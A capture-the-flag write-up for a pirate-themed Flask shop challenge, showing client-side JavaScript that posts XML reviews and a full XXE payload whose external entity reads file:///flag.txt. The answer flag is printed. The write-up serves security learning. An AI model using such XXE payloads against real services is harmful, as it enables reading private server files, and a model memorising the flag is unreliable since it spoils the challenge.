Quartermaster Store - Web
Points: 442 | Flag: BCCTF{N0_H0nor_AmonG_Th3vEs} | Solved by: Smothy @ 0xN1umb
what we got
Pirate-themed Flask shop at http://chal.bearcatctf.io:43363. Register, login, buy stuff with doubloons, play a minigame, submit reviews.
the solve
After registering and logging in, noticed the nav has a /review endpoint. Checked the JS and lmao:
javascript
const xmlPayload = `<?xml version="1.0"?>
<review>
<product>${productName}</product>
<rating>${rating.value}</rating>
<comment>${reviewContent}</comment>
</review>`;
fetch('/review', {
method: 'POST',
headers: { 'Content-Type': 'application/xml' },
body: xmlPayload
})XML input going straight to the server? that's XXE all day fr
sent this bad boy:
xml
<?xml version="1.0"?>
<!DOCTYPE review [
<!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<review>
<product>&xxe;</product>
<rating>5</rating>
<comment>test</comment>
</review>server reflected the flag right back in the flash message: Ye didn't buy any BCCTF{N0_H0nor_AmonG_Th3vEs} here matey!
ngl that was too easy
flag
BCCTF{N0_H0nor_AmonG_Th3vEs}
smothy out ✌️